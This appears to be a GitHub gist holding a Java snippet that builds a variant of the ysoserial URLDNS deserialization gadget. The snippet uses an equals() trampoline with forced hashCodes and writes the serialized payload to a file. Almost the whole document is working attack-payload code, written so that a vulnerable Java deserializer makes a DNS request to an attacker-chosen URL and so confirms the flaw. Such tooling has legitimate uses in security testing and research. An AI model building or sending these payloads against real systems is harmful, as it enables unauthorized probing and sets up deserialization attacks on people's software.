Created
February 3, 2020 21:57
-
-
Save Frycos/e3811d4a2e2d856e9928ec1790fb7863 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* ysoserial URLDNS gadget | |
| * but this time with equals() trampoline | |
| * hashcode is not set to -1 | |
| * author: @frycos | |
| */ | |
| static void buildDNSGadget(String url) throws Exception { | |
| URLStreamHandler handler = new SilentURLStreamHandler(); | |
| URL u = new URL(null, url, handler); | |
| URL dc = new URL(null, "http://127.0.0.1", handler); | |
| HashSet ht = new HashSet(); | |
| ht.add(u); | |
| ht.add(dc); | |
| Field hc = URL.class.getDeclaredField("hashCode"); | |
| hc.setAccessible(true); | |
| hc.set(u, 1337); | |
| hc.set(dc, 1337); | |
| OutputStream os = new FileOutputStream("C:\\Users\\Public\\Downloads\\file.ser"); | |
| ObjectOutputStream oos = new ObjectOutputStream(os); | |
| oos.writeObject(ht); | |
| System.out.println("Serialized file written..."); | |
| oos.close(); | |
| } | |
| static class SilentURLStreamHandler extends URLStreamHandler { | |
| @Override | |
| protected URLConnection openConnection(URL u) throws IOException { | |
| return null; | |
| } | |
| protected synchronized InetAddress getHostAddress(URL u) { | |
| return null; | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment